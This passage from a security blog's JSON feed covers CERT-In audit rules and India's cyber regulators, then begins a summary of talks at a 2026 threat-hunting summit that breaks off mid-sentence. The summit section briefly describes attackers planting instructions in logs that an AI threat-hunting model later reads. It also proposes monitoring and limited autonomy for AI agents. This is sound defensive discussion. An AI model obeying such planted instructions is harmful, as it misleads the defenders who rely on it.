aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">7</a></sup></li>\n<li class=\"\"><strong>Scope now spans the entire digital estate</strong>: IT systems, operational technology, cloud, APIs, databases, source code, and incident response, across development, staging, and production environments alike.</li>\n<li class=\"\"><strong>Software, and increasingly AI, bill-of-materials audits are part of the picture too</strong>, checking for transparency and traceability across the supply chain, not just the application layer.</li>\n<li class=\"\">Non-compliance carries real teeth. Auditors who repeatedly miss things can be suspended from CERT-In's approved list, and organizations remain on the hook under the older, still fully active 2022 Directions running alongside this: 6-hour incident reporting and 180-day log retention.<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-8-1005ab\" id=\"user-content-fnref-8-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">8</a></sup></li>\n</ul>\n<p>Read between the lines and the message is blunt: if you don't already know your assets, understand your real exposure, and can translate it into terms a non-technical executive would sign their name to, you are not audit-ready. You're improvising under a legal deadline, with a compliance officer explaining to the board why they're about to personally attest to risk nobody actually measured.</p>\n<p>Organizations that already run mature vulnerability management, with full asset visibility, validated exposure data, and business-risk framing baked into every report, walk into this kind of audit with most of the hard work already done. Everyone else is building the plane while it's already being inspected mid-flight.</p>\n<p>And CERT-In isn't the only regulator with a clock running. Indian security leaders answer to a stack, not a single body:</p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<table><thead><tr><th>Regulator</th><th>What it actually requires</th></tr></thead><tbody><tr><td><strong>CERT-In</strong></td><td>6-hour incident reporting and 180-day log retention under the 2022 Directions, plus the 2025 audit guidelines above<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-8-1005ab\" id=\"user-content-fnref-8-1005ab-2\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">8</a></sup></td></tr><tr><td><strong>DPDP Act</strong></td><td>Rules notified in November 2025, with core obligations phasing in through May 2027, carrying its own breach-notification duties<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-9-1005ab\" id=\"user-content-fnref-9-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">9</a></sup></td></tr><tr><td><strong>RBI</strong></td><td>IT governance directions for banks and NBFCs requiring a 6-hour initial report plus a 21-day root cause analysis, filed through its Centralised Information Management System<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-10-1005ab\" id=\"user-content-fnref-10-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">10</a></sup></td></tr><tr><td><strong>SEBI</strong></td><td>A cyber resilience framework built around anticipate, withstand, contain, recover, and evolve, with mandatory vulnerability assessment and penetration testing<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-11-1005ab\" id=\"user-content-fnref-11-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">11</a></sup></td></tr><tr><td><strong>IRDAI</strong></td><td>An AI cyber-readiness action-taken report required from every insurer, due May 2026<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-4-1005ab\" id=\"user-content-fnref-4-1005ab-2\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">4</a></sup></td></tr><tr><td><strong>NCIIPC</strong></td><td>Incident reporting duties for operators of designated critical information infrastructure, layered on top of CERT-In's national reporting clock<sup><a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fn-12-1005ab\" id=\"user-content-fnref-12-1005ab\" data-footnote-ref=\"\" aria-describedby=\"footnote-label\" class=\"anchorTargetStickyNavbar_Vzrq\">12</a></sup></td></tr></tbody></table>\n<p>The good news, if there is one: every requirement in that stack, asset visibility, exploitability context, business-risk framing, proof of remediation, is exactly what a well-run vulnerability management program produces anyway. Build it for the business case, and you've basically built it for the regulators too. Treat compliance and good security as two separate projects, and you'll end up doing the work twice.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-basics-still-matter-even-with-ai-in-the-mix\">The Basics Still Matter, Even With AI in the Mix<a href=\"https://haxnation.github.io/blog/vulnerability-management#the-basics-still-matter-even-with-ai-in-the-mix\" class=\"hash-link\" aria-label=\"Direct link to The Basics Still Matter, Even With AI in the Mix\" title=\"Direct link to The Basics Still Matter, Even With AI in the Mix\" translate=\"no\">​</a></h2>\n<p>As attackers lean harder on AI to speed things up, the fundamentals don't change. They just get less optional.</p>\n<ul>\n<li class=\"\"><strong>Assume you'll get breached.</strong> Build for rapid detection, containment, and recovery, backed by continuous monitoring, network segmentation, solid telemetry, and breach simulations run often enough that they're not a surprise when it's real.</li>\n<li class=\"\"><strong>Trust nothing by default.</strong> Strong identity security, micro-segmentation, and conditional access policies that actually monitor sessions in real time, not just at the login screen.</li>\n<li class=\"\"><strong>Layer your defenses.</strong> Infrastructure, applications, identities, cloud environments, AI systems, and data loss prevention all need protecting, tied together with integrated monitoring instead of running as disconnected silos.</li>\n<li class=\"\"><strong>Never stop watching.</strong> Always-on attack surface monitoring, automated vulnerability scanning, cloud posture assessments, and, critically, immediate validation that a fix actually worked, not just that it was deployed.</li>\n</ul>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"where-this-actually-leaves-you\">Where This Actually Leaves You<a href=\"https://haxnation.github.io/blog/vulnerability-management#where-this-actually-leaves-you\" class=\"hash-link\" aria-label=\"Direct link to Where This Actually Leaves You\" title=\"Direct link to Where This Actually Leaves You\" translate=\"no\">​</a></h2>\n<p>Stop measuring your security program by how many tickets it closes. Start measuring it by how few days a real, exploitable risk sits open, what that number is costing you in rupees rather than reputation, and whether you could hand a regulator your asset list tomorrow without flinching.</p>\n<p>The regulators just made all three of those mandatory. You might as well get ahead of it.</p>\n<hr>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"sources\">Sources<a href=\"https://haxnation.github.io/blog/vulnerability-management#sources\" class=\"hash-link\" aria-label=\"Direct link to Sources\" title=\"Direct link to Sources\" translate=\"no\">​</a></h3>\n<!-- -->\n<section data-footnotes=\"\" class=\"footnotes\"><h2 class=\"anchor anchorTargetStickyNavbar_Vzrq sr-only\" id=\"footnote-label\">Footnotes<a href=\"https://haxnation.github.io/blog/vulnerability-management#footnote-label\" class=\"hash-link\" aria-label=\"Direct link to Footnotes\" title=\"Direct link to Footnotes\" translate=\"no\">​</a></h2>\n<ol>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-1-1005ab\">\n<p>Qualys Threat Research Unit, \"The Broken Physics of Remediation\" (2026), based on analysis of over 1 billion CISA KEV remediation records across 10,000+ organizations, 2022 to 2025. <a href=\"https://cdn2.qualys.com/docs/mktg/qualys-tru-the-broken-physics-of-remediation.pdf\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Report PDF</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-1-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 1\" class=\"data-footnote-backref\">↩</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-1-1005ab-2\" data-footnote-backref=\"\" aria-label=\"Back to reference 1-2\" class=\"data-footnote-backref\">↩<sup>2</sup></a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-2-1005ab\">\n<p>Nucleus Security, research on CISA KEV catalog and CVSS scoring gaps (2022). <a href=\"https://businesswire.com/news/home/20221101005302/en/Nucleus-Security-Releases-Free-CISA-KEV-Enrichment-Dashboard-and-Research-Providing-Further-Insight-Into-Vulnerability-Prioritization\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Businesswire release</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-2-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 2\" class=\"data-footnote-backref\">↩</a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-3-1005ab\">\n<p>IBM, \"Cost of a Data Breach Report 2025\" (India findings), published August 7, 2025. <a href=\"https://in.newsroom.ibm.com/2025-08-07-India-Records-Highest-Average-Cost-of-a-Data-Breach-IBM\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">IBM Newsroom</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-3-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 3\" class=\"data-footnote-backref\">↩</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-3-1005ab-2\" data-footnote-backref=\"\" aria-label=\"Back to reference 3-2\" class=\"data-footnote-backref\">↩<sup>2</sup></a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-4-1005ab\">\n<p>Reporting on IRDAI's May 2026 directive to insurers on AI cyber-readiness action-taken reports. <a href=\"https://www.insurancebusinessmag.com/asia/news/cyber/three-days-to-aiproof-india-hands-insurers-an-emergency-cyberreadiness-deadline-575682.aspx\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Insurance Business Magazine</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-4-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 4\" class=\"data-footnote-backref\">↩</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-4-1005ab-2\" data-footnote-backref=\"\" aria-label=\"Back to reference 4-2\" class=\"data-footnote-backref\">↩<sup>2</sup></a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-5-1005ab\">\n<p>CERT-In, \"Comprehensive Cyber Security Audit Policy Guidelines,\" Version 1.0, July 25, 2025. <a href=\"https://www.cert-in.org.in/PDF/Comprehensive_Cyber_Security_Audit_Policy_Guidelines.pdf\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Official PDF</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-5-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 5\" class=\"data-footnote-backref\">↩</a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-6-1005ab\">\n<p>Legal analysis of the CERT-In 2025 audit guidelines' dual CVSS/EPSS scoring and CWE/CVE mapping requirements. <a href=\"https://www.azbpartners.com/bank/strengthening-indias-cyber-defence-cert-ins-new-cyber-security-audit-guidelines-decoded/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">AZB &amp; Partners</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-6-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 6\" class=\"data-footnote-backref\">↩</a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-7-1005ab\">\n<p>Summary of senior-management accountability provisions under the 2025 CERT-In audit guidelines. <a href=\"https://seconize.co/blog/cert-ins-comprehensive-cyber-security-audit-policy-guidelines/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Seconize</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-7-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 7\" class=\"data-footnote-backref\">↩</a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-8-1005ab\">\n<p>Overview of CERT-In's April 2022 Directions on 6-hour incident reporting and 180-day log retention. <a href=\"https://creativecyber.in/resources/cert-in-6-hour-incident-reporting/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">CreativeCyber</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-8-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 8\" class=\"data-footnote-backref\">↩</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-8-1005ab-2\" data-footnote-backref=\"\" aria-label=\"Back to reference 8-2\" class=\"data-footnote-backref\">↩<sup>2</sup></a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-9-1005ab\">\n<p>Digital Personal Data Protection Rules, 2025, notified by MeitY on November 13/14, 2025. <a href=\"https://en.wikipedia.org/wiki/Digital_Personal_Data_Protection_Rules,_2025\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Wikipedia summary with primary PIB citation</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-9-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 9\" class=\"data-footnote-backref\">↩</a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-10-1005ab\">\n<p>Overview of RBI's Master Direction on IT Governance, Risk, Controls and Assurance Practices, and CIMS reporting timelines. <a href=\"https://www.cybernx.com/how-to-draft-board-approved-it-cybersecurity-policy-rbi-master-direction/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">CyberNX</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-10-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 10\" class=\"data-footnote-backref\">↩</a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-11-1005ab\">\n<p>SEBI Cybersecurity and Cyber Resilience Framework (CSCRF), issued August 20, 2024. <a href=\"https://cybersigmacs.com/knowledge-center/sebi-cscrf/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">CyberSigma summary</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-11-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 11\" class=\"data-footnote-backref\">↩</a></p>\n</li>\n<li class=\"anchorTargetStickyNavbar_Vzrq\" id=\"user-content-fn-12-1005ab\">\n<p>National Critical Information Infrastructure Protection Centre, mandate and incident reporting role under Section 70A of the IT Act. <a href=\"https://en.wikipedia.org/wiki/National_Critical_Information_Infrastructure_Protection_Centre\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Wikipedia</a> <a href=\"https://haxnation.github.io/blog/vulnerability-management#user-content-fnref-12-1005ab\" data-footnote-backref=\"\" aria-label=\"Back to reference 12\" class=\"data-footnote-backref\">↩</a></p>\n</li>\n</ol>\n</section>",
            "url": "https://haxnation.github.io/blog/vulnerability-management",
            "title": "Surviving CERT-In's 12-Hour SLA Without Mythos",
            "summary": "This blog is a summary of talk held by Qualys titled Surviving CERT-In's 12-Hour SLA Without Mythos on 1st July 2026.\n",
            "date_modified": "2026-07-17T04:00:00.000Z",
            "author": {
                "name": "Ayushya Shah",
                "url": "https://github.com/A-Y-U-S-H-Y-A"
            },
            "tags": [
                "vulnerability-management",
                "exposure-management",
                "patch-management",
                "attack-surface-management",
                "risk-management",
                "asset-management",
                "CVSS",
                "EPSS",
                "CISA-KEV",
                "CERT-In",
                "cyber-resilience",
                "compliance",
                "AI-security",
                "cloud-security",
                "application-security",
                "Qualys"
            ]
        },
        {
            "id": "https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary",
            "content_html": "<p>This blog is a summary of talks held at <em>Antisyphon Training - Threat Hunting Summit 2026</em> on 17th June 2026.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"morning-keynote-hunters-paradox---is-it-time-to-embrace-automated-threat-hunting-by-david-bianco\">Morning Keynote: \"Hunters Paradox - Is It Time to Embrace Automated Threat Hunting\" by David Bianco<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#morning-keynote-hunters-paradox---is-it-time-to-embrace-automated-threat-hunting-by-david-bianco\" class=\"hash-link\" aria-label=\"Direct link to Morning Keynote: &quot;Hunters Paradox - Is It Time to Embrace Automated Threat Hunting&quot; by David Bianco\" title=\"Direct link to Morning Keynote: &quot;Hunters Paradox - Is It Time to Embrace Automated Threat Hunting&quot; by David Bianco\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction\">Introduction<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#introduction\" class=\"hash-link\" aria-label=\"Direct link to Introduction\" title=\"Direct link to Introduction\" translate=\"no\">​</a></h3>\n<p>This keynote session posed more brainstorming questions that would drive the community to think and tinker around and identify effective approaches to AI enabled threat hunting.</p>\n<p>As we already know that AI attacks are on the rise, so what would happen if we as defenders use AI to our advantage?</p>\n<p>From a threat actor's perspective, adopting AI is relatively straightforward and they use AI more aggressively as they are not concerned about collateral damage or unintended consequences, on the other hand defenders must take a far more measured and responsible approach while using AI for defense as it can inadvertently weaken an organization's security posture if not implemented properly.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-we-cant-trust-ai\">Why we can't trust AI<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#why-we-cant-trust-ai\" class=\"hash-link\" aria-label=\"Direct link to Why we can't trust AI\" title=\"Direct link to Why we can't trust AI\" translate=\"no\">​</a></h3>\n<p>How the attackers/threat actors can cheat us -</p>\n<ul>\n<li class=\"\"><strong>Deceiving the AI directly</strong> - Threat actors can embed instructions in logs/telemetry that the AI later reads during threat hunting and in turn performing a <mark>prompt injection attack</mark> on the AI model.</li>\n<li class=\"\"><strong>Deceiving via deception</strong> - Attackers operate in a medium of lies. While telemetry itself may be technically accurate but threat actor might have staged benign looking activity masking malicious actions. Because AI models are bad at subtlety (adversarial deception in our case), they may misinterpret these signals and produce inaccurate assessments or reports.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-hunters-paradox\">The Hunter's Paradox<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#the-hunters-paradox\" class=\"hash-link\" aria-label=\"Direct link to The Hunter's Paradox\" title=\"Direct link to The Hunter's Paradox\" translate=\"no\">​</a></h3>\n<p>Modern security environments generate terabytes of telemetry everyday.\nThe sheer volume and velocity at which these telemetry gets ingested makes it difficult for humans to read and analyse it all, even large teams can't keep up with this scale.\nModern day threat actors with the help of AI operate at machine speed, so we have to act quickly as well which can only done with the help of AI, but we can't trust it as well.</p>\n<blockquote>\n<p><em>This is Hunter's Paradox — We can't hunt at scale without AI, but we can't fully trust the AI we need.</em></p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"proposing-a-new-era-of-threat-hunting\">Proposing a new era of threat hunting<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#proposing-a-new-era-of-threat-hunting\" class=\"hash-link\" aria-label=\"Direct link to Proposing a new era of threat hunting\" title=\"Direct link to Proposing a new era of threat hunting\" translate=\"no\">​</a></h3>\n<p>In 2015, organizations increasingly recognized the need for threat hunting, driven by the fear that attackers could already be present in their environments and that traditional detection systems were insufficient, but people were not sure on what it was or how to perform it, there was no single framework to define that. So to teach people threat hunting and sell their product, <em>Sqrrl Threat Hunting Loop</em> was created. Sqrrl's framework was the first published \"how to\" for threat hunting.\nIt Focused on hypothesis-driven hunting and detection improvement.\nLater: <em>PEAK Threat Hunting Framework</em> (Splunk, 2023) was built on similar ideas.</p>\n<p>Both frameworks defined threat hunting as:</p>\n<blockquote>\n<p><em>\"Any manual or machine-assisted process for identifying security incidents your automated detection systems missed.\"</em></p>\n</blockquote>\n<p>For many years this definition was valid as machine assited humans by accelerating investigations but at the end we needed a human to drive the hunt, but he thinks that this is coming to an end.</p>\n<p>So if it can't be manual or machine assisted then what it should be?\nNow David proposes a new definition as Threat hunting might be…</p>\n<blockquote>\n<p><mark>\"Any <strong>reasoning-driven</strong> process for identifying security incidents your automated detection systems missed.\"</mark></p>\n</blockquote>\n<p>As today, humans are not only the ones who can reason, AI can also reason, these models are not perfect but it can do the work.\nSo if hunting is reason driven, then we should allow AI to drive the hunts.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"blueprint-for-autonomous-ai-hunts--the-three-pillars\">Blueprint for Autonomous AI Hunts — The Three Pillars<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#blueprint-for-autonomous-ai-hunts--the-three-pillars\" class=\"hash-link\" aria-label=\"Direct link to Blueprint for Autonomous AI Hunts — The Three Pillars\" title=\"Direct link to Blueprint for Autonomous AI Hunts — The Three Pillars\" translate=\"no\">​</a></h3>\n<p>Now we have to allow AI to drive the process, where should we start?\nWe can't just give AI so much data and tell it to hunt, we need some structure and guardrails to be really effective.</p>\n<ol>\n<li class=\"\"><strong>Tight Focus</strong> – AI should initially be assigned well-scoped, familiar, and highly contained hunting tasks. These are hunts with established procedures, known objectives, and clear success criteria rather than open-ended investigations requiring deep contextual understanding. A good starting point is existing hunt procedures developed by experienced threat hunters. For example, communities such as the <em>THOR Collective</em> have documented hunt procedures that provide structured workflows while still requiring some level of reasoning.</li>\n<li class=\"\"><strong>Strict Guidelines</strong> – Clear rules on what the AI can and cannot do. We can't afford to deploy AI systems without strong identity and access management (IAM) controls. AI agents should be treated much like service accounts: they need unique identities, well-defined permissions, continuous monitoring, and comprehensive audit trails. Every action they take should be attributable, traceable, and governed by clear security policies. <mark>Treat AI as a capable but inexperienced employee.</mark></li>\n<li class=\"\"><strong>Graduated Autonomy</strong> – Begin with advisory roles with limited actions then later give more autonomy as trust builds.</li>\n</ol>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"existing-ai-hunting-capabilities\">Existing AI Hunting Capabilities<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#existing-ai-hunting-capabilities\" class=\"hash-link\" aria-label=\"Direct link to Existing AI Hunting Capabilities\" title=\"Direct link to Existing AI Hunting Capabilities\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Tools and assistants already exist (e.g., David's open-source <em>PEAK Assistant</em> targets the Prepare phase: scoping and planning).</li>\n<li class=\"\">Automation is stronger in Execute and Act phases.</li>\n<li class=\"\">Combination of agent skills + MCP servers can go quite far.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"recommendations-going-forward\">Recommendations Going Forward<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#recommendations-going-forward\" class=\"hash-link\" aria-label=\"Direct link to Recommendations Going Forward\" title=\"Direct link to Recommendations Going Forward\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Reframe hunting as <em>reasoning-driven</em>.</li>\n<li class=\"\">Three Pillars — Narrow scope + strict guidelines + graduated autonomy.</li>\n<li class=\"\">Humans set the agenda and drive creative/strategic elements.</li>\n<li class=\"\">Experiment as a community.</li>\n<li class=\"\">Don't over rely on AI always keep humans in the driver's seat.</li>\n</ul>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"talk-1-how-agents-solve-threat-huntings-biggest-problem-by-faan-rossouw\">Talk 1: \"How Agents Solve Threat Huntings Biggest Problem\" by Faan Rossouw<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#talk-1-how-agents-solve-threat-huntings-biggest-problem-by-faan-rossouw\" class=\"hash-link\" aria-label=\"Direct link to Talk 1: &quot;How Agents Solve Threat Huntings Biggest Problem&quot; by Faan Rossouw\" title=\"Direct link to Talk 1: &quot;How Agents Solve Threat Huntings Biggest Problem&quot; by Faan Rossouw\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction-1\">Introduction<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#introduction-1\" class=\"hash-link\" aria-label=\"Direct link to Introduction\" title=\"Direct link to Introduction\" translate=\"no\">​</a></h3>\n<p>Faan picks up exactly where David's keynote left off.\nHe walks on the same line of questions that David presented us in the keynote and suggests what would happen if we replace human judgement with a pattern matching agent.\nTo present the problem to us, he takes help of an analogy.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-analogy--spotting-the-deer-in-the-forest\">The Analogy — Spotting the deer in the forest<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#the-analogy--spotting-the-deer-in-the-forest\" class=\"hash-link\" aria-label=\"Direct link to The Analogy — Spotting the deer in the forest\" title=\"Direct link to The Analogy — Spotting the deer in the forest\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">You're in a forest with a radio, Faan tells you to report over the radio as soon as you see a deer.</li>\n<li class=\"\">You spot a deer, you report it to Faan.</li>\n<li class=\"\">You spot a <em>deer with a mustache</em>, you laugh and report the variation naturally.</li>\n<li class=\"\">Now, Replace the human with a rigid pattern matching agent (GOF deterministic detection signature) it only sees exact \"deer\" and misses variants.</li>\n</ul>\n<p>Now how to solve this problem? One way would be to just relax the detection criteria so that the agent spots the variation as well. But it introduces another problem, i.e. <strong>False Positive Deluge</strong>.</p>\n<p>So if detection criteria is -</p>\n<ul>\n<li class=\"\">Too Strict = Miss slight variations, FNs = <em>Brittle</em></li>\n<li class=\"\">Too Relaxed = Introduce too many FPs = <em>Noisy</em></li>\n</ul>\n<blockquote>\n<p><em>Alert based security is <mark>low resolution</mark>.</em></p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-alert-based-security-is-low-resolution\">Why alert based security is low resolution?<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#why-alert-based-security-is-low-resolution\" class=\"hash-link\" aria-label=\"Direct link to Why alert based security is low resolution?\" title=\"Direct link to Why alert based security is low resolution?\" translate=\"no\">​</a></h3>\n<p>So in a typical SOC environment, if we focus only on the alert part, from a machine's perspective it will be just a boolean value, i.e., it will be an alert or not one, but for us as humans there is more to it, we use initial breadcrumbs to derive a conclusion or there is some kind of chain of thoughts associated to it which drives our process to evaluate, we like to connect the dots to arrive at a conclusion, or for that matter make intuitive calls during the process, that is what human judgement is all about in threat hunting, we drive the process, we are involved in the detection itself and not just in reviewing the output.</p>\n<blockquote>\n<p><em>The main goal of threat hunting is not just to find threats, it's main goal is to <mark>drive overall improvement in security posture</mark>, as David reframed it in the PEAK framework.</em></p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"if-threat-hunting-is-so-great-why-is-it-still-seen-as-a-luxury\">If threat hunting is so great, why is it still seen as a luxury?<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#if-threat-hunting-is-so-great-why-is-it-still-seen-as-a-luxury\" class=\"hash-link\" aria-label=\"Direct link to If threat hunting is so great, why is it still seen as a luxury?\" title=\"Direct link to If threat hunting is so great, why is it still seen as a luxury?\" translate=\"no\">​</a></h3>\n<p>As David also highlighted in his keynote, the detection demand is increasing but human judgement can't dramatically scale with it and match the requirements.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"so-what-is-his-core-thesis\">So what is his core thesis?<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#so-what-is-his-core-thesis\" class=\"hash-link\" aria-label=\"Direct link to So what is his core thesis?\" title=\"Direct link to So what is his core thesis?\" translate=\"no\">​</a></h3>\n<blockquote>\n<p><em>\"We can dramatically scale human judgement through the <mark>intentional integration of an agentic layer</mark> in a threat hunting system.\"</em></p>\n</blockquote>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-to-then-do-intentional-integration\">How to then do intentional integration?<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#how-to-then-do-intentional-integration\" class=\"hash-link\" aria-label=\"Direct link to How to then do intentional integration?\" title=\"Direct link to How to then do intentional integration?\" translate=\"no\">​</a></h4>\n<p>Identify where you can utilize transformer based intelligence to maximize strengths of your organisations while also retaining deterministic code and human intelligence, if there is a chance of AI hallucination then stick to the basics of using the good old fashion deterministic code. So it all boils down in identifying key areas where you can boost your overall security posture and use the strengths of all three.</p>\n<p>Keypoints -</p>\n<ul>\n<li class=\"\">Use where it presents value</li>\n<li class=\"\">Omit where it does not present value</li>\n<li class=\"\">Maximize strengths</li>\n<li class=\"\">Minimize + mitigate weaknesses</li>\n</ul>\n<p>So to cover all these keypoints he proposes <strong>9 fundamental methods</strong> to integrate Agentic AI into existing systems.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"9-fundamental-methods-for-integrating-agentic-ai-into-existing-systems\">9 fundamental methods for integrating Agentic AI into existing systems<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#9-fundamental-methods-for-integrating-agentic-ai-into-existing-systems\" class=\"hash-link\" aria-label=\"Direct link to 9 fundamental methods for integrating Agentic AI into existing systems\" title=\"Direct link to 9 fundamental methods for integrating Agentic AI into existing systems\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"1-data-agent-interface\">1. Data-Agent Interface<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#1-data-agent-interface\" class=\"hash-link\" aria-label=\"Direct link to 1. Data-Agent Interface\" title=\"Direct link to 1. Data-Agent Interface\" translate=\"no\">​</a></h4>\n<p>You cannot simply dump millions of logs into an LLM and tell it to \"find evil.\" Agents are designed for reasoning, not raw calculation. Doing so leads to context overflow, the \"lost in the middle\" fallacy, high latency, and spurious correlations. To bridge this gap efficiently, defenders must use:</p>\n<ul>\n<li class=\"\">\n<p><strong>Pre-Emptive Data Analysis (Distillation):</strong> Using traditional compute to run statistical analysis on all the 